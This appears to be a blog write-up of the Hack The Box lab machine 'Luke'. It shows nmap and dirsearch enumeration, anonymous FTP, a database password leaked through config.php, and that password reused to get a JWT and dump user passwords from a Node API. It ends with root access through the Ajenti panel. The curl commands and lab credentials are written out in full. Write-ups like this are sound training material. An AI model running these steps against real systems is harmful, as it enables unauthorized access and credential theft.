Ech0 - 23 / 04 / 2020

Luke Writeup

Introduction :



Luke is a FreeBSD Medium box that was released back in May 2019.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.


  [ 85.171.153.138 ] [ /dev/pts/0 ] [Documents/Github/blog]
  → sudo nmap -vvv -sTU -p- 10.10.10.137 --max-retries 0 -Pn --min-rate=500 | grep Discovered
  Discovered open port 80/tcp on 10.10.10.137
  Discovered open port 22/tcp on 10.10.10.137
  Discovered open port 21/tcp on 10.10.10.137
  Discovered open port 3000/tcp on 10.10.10.137
  Discovered open port 8000/tcp on 10.10.10.137

  [ 85.171.153.138 ] [ /dev/pts/0 ] [Documents/Github/blog]
  → nmap -sCV -p21,22,80,3000,8000 10.10.10.137
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-23 10:21 BST
  Nmap scan report for 10.10.10.137
  Host is up (0.093s latency).

  PORT     STATE SERVICE VERSION
  21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  |_drwxr-xr-x    2 0        0             512 Apr 14  2019 webapp
  | ftp-syst:
  |   STAT:
  | FTP server status:
  |      Connected to 10.10.14.15
  |      Logged in as ftp
  |      TYPE: ASCII
  |      No session upload bandwidth limit
  |      No session download bandwidth limit
  |      Session timeout in seconds is 300
  |      Control connection is plain text
  |      Data connections will be plain text
  |      At session startup, client count was 2
  |      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
  |_End of status
  22/tcp   open  ssh?
  |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
  80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
  | http-methods:
  |_  Potentially risky methods: TRACE
  |_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
  |_http-title: Luke
  3000/tcp open  http    Node.js Express framework
  |_http-title: Site doesn't have a title (application/json; charset=utf-8).
  8000/tcp open  http    Ajenti http control panel
  |_http-title: Ajenti

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 178.00 seconds

Part 2 : Getting User Access



Our nmap scan picked up port 21 with anonymous login so let's investigate it:



  [ 10.10.14.15 ] [ /dev/pts/0 ] [Documents/Github/blog]
  → ftp 10.10.10.137
  Connected to 10.10.10.137.
  220 vsFTPd 3.0.3+ (ext.1) ready...
  Name (10.10.10.137:nothing): anonymous
  331 Please specify the password.
  Password:
  230 Login successful.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp> ls
  200 PORT command successful. Consider using PASV.
  150 Here comes the directory listing.
  drwxr-xr-x    2 0        0             512 Apr 14  2019 webapp
  226 Directory send OK.
  ftp> cd webapp
  250 Directory successfully changed.
  ftp> ls
  200 PORT command successful. Consider using PASV.
  150 Here comes the directory listing.
  -r-xr-xr-x    1 0        0             306 Apr 14  2019 for_Chihiro.txt
  226 Directory send OK.
  ftp> get for_Chihiro.txt
  local: for_Chihiro.txt remote: for_Chihiro.txt
  200 PORT command successful. Consider using PASV.
  150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).
  226 Transfer complete.
  306 bytes received in 0.00 secs (1.7903 MB/s)
  ftp> exit
  221 Goodbye.

  [ 10.10.14.15 ] [ /dev/pts/0 ] [Documents/Github/blog]
  → mkdir ~/_HTB/Luke && mv for_Chihiro.txt ~/_HTB/Luke

  [ 10.10.14.15 ] [ /dev/pts/0 ] [Documents/Github/blog]
  → cd ~/_HTB/Luke && file for_Chihiro.txt && cat for_Chihiro.txt
  for_Chihiro.txt: ASCII text
  Dear Chihiro !!

  As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of
  the actual website I've created .
  Normally you should know where to look but hurry up because I will delete them soon because of our security policies !

  Derry

looks like they have a bunch of sourcecode but not available through anonymous login via ftp, so we'll investigate port 80 instead which is a bootstrap4 template page:

Taking a look at port 3000 and 8000 are both more interesting:

Which reveals us an Ajenti login webpage, and the node.js express framework JSON webapp our nmap scan picked up earlier. so let's investigate with gobuster what lies on the previous port 80:


  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → dirsearch -u http://10.10.10.137 -e php
  git clone https://github.com/maurosoria/dirsearch.git
  dirsearch -u <url> -e <php,txt,html,js> -t 50 -x 500

   _|. _ _  _  _  _ _|_    v0.3.9
  (_||| _) (/_(_|| (_| )

  Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 6046

  Error Log: /home/nothing/Desktop/Tools/dirsearch/logs/errors-20-04-24_09-04-58.log

  Target: http://10.10.10.137

  [09:04:58] Starting:
  [09:05:02] 403 -  213B  - /.hta
  [09:05:02] 403 -  220B  - /.ht_wsr.txt
  [09:05:02] 403 -  222B  - /.htaccess-dev
  [09:05:02] 403 -  224B  - /.htaccess-local
  [09:05:02] 403 -  224B  - /.htaccess-marco
  [09:05:02] 403 -  222B  - /.htaccess.BAK
  [09:05:02] 403 -  223B  - /.htaccess.bak1
  [09:05:02] 403 -  222B  - /.htaccess.old
  [09:05:02] 403 -  223B  - /.htaccess.orig
  [09:05:02] 403 -  225B  - /.htaccess.sample
  [09:05:02] 403 -  223B  - /.htaccess.save
  [09:05:02] 403 -  222B  - /.htaccess.txt
  [09:05:02] 403 -  224B  - /.htaccess_extra
  [09:05:02] 403 -  223B  - /.htaccess_orig
  [09:05:02] 403 -  221B  - /.htaccess_sc
  [09:05:02] 403 -  221B  - /.htaccessBAK
  [09:05:02] 403 -  221B  - /.htaccessOLD
  [09:05:02] 403 -  222B  - /.htaccessOLD2
  [09:05:02] 403 -  219B  - /.htaccess~
  [09:05:02] 403 -  217B  - /.htgroup
  [09:05:02] 403 -  222B  - /.htpasswd-old
  [09:05:02] 403 -  223B  - /.htpasswd_test
  [09:05:02] 403 -  219B  - /.htpasswds
  [09:05:02] 403 -  217B  - /.htusers
  [09:05:25] 200 -  202B  - /config.php
  [09:05:27] 301 -  232B  - /css  ->  http://10.10.10.137/css/
  [09:05:34] 200 -    1KB - /gulpfile.js
  [09:05:36] 200 -    3KB - /index.html
  [09:05:38] 301 -  231B  - /js  ->  http://10.10.10.137/js/
  [09:05:39] 200 -    1KB - /LICENSE
  [09:05:40] 200 -    2KB - /login.php
  [09:05:41] 401 -  381B  - /management
  [09:05:41] 401 -  381B  - /management/
  [09:05:42] 301 -  235B  - /member  ->  http://10.10.10.137/member/
  [09:05:42] 200 -  216B  - /member/
  [09:05:46] 200 -    1KB - /package.json
  [09:05:51] 200 -    4KB - /README.md

  Task Completed

Here the interesting thing is config.php


  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -sk http://10.10.10.137/config.php
  $dbHost = 'localhost';
  $dbUsername = 'root';
  $dbPassword  = 'Zk6heYCyv6ZE9Xcg';
  $db = "login";

  $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);

Which gives us credentials for a database on localhost root:Zk6heYCyv6ZE9Xcg. Now back on port 3000 the error message was "auth token is not supplied" Therefore we could use curl to supply the needed parameters of said token, whose password is the one we found earlier, but we had to guess the username, which was "admin"

As you can see the credentials we found do not work on the login page of port 8000, so we'll use curl on the jwt application itself, especially on the login page:


  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → dirsearch -u http://10.10.10.137:3000 -e php,html,txt
  git clone https://github.com/maurosoria/dirsearch.git
  dirsearch -u  -e  -t 50 -x 500

   _|. _ _  _  _  _ _|_    v0.3.9
  (_||| _) (/_(_|| (_| )

  Extensions: php, html, txt | HTTP method: get | Threads: 10 | Wordlist size: 6748

  Error Log: /home/nothing/Desktop/Tools/dirsearch/logs/errors-20-04-24_09-24-12.log

  Target: http://10.10.10.137:3000

  [09:24:12] Starting:
  [09:24:58] 200 -   13B  - /login
  [09:24:58] 200 -   13B  - /Login
  [09:24:59] 200 -   13B  - /login/
  [09:25:21] 200 -   56B  - /users
  [09:25:21] 200 -   56B  - /users/
  [09:25:21] 200 -   56B  - /users/admin

  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"root","password":"Zk6heYCyv6ZE9Xcg"}'
  Forbidden

  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'
  {"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM"}

And there we have it ! Now we get a JWT token after logging in:


{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM"}

After reading JWT's documentation, In order to authenticate we add the following header to the get request on to view the contents of /users


  Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM

So we use it to list the users on the box:


  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'
  {"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI"}%
  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users

  [{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]

which we can use to list each of their passwords:


  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users

  [{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]%
  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Dory

  {"name":"Dory","password":"5y:!xa=ybfe)/QD"}%
  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Derry

  {"name":"Derry","password":"rZ86wwLvx7jUxtch"}%
  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Yuri

  {"name":"Yuri","password":"bet@tester87"}%
  [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
  → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Admin

  {"name":"Admin","password":"WX5b7)>/rp$U)FW"}

We use derry's credentials to login :

And we are logged in !

Part 3 : Getting Root Access



From there we need to go to config.json where the ajenti credentials are:

root:KpMasng6S5EtTy9Z

Once logged in we are able to get more information about the box which is a FreeBSD 12.0-RELEASE amd64 machine. From there we simply head over to the terminal tab, from which we can execute commands as the root user, and therefore print out both flags.

Conclusion



Here we can see the progress graph :

My Bunker

Some Address 67120,
Duttlenheim, France.

About Ech0

This cute theme was created to showcase your work in a simple way. Use it wisely.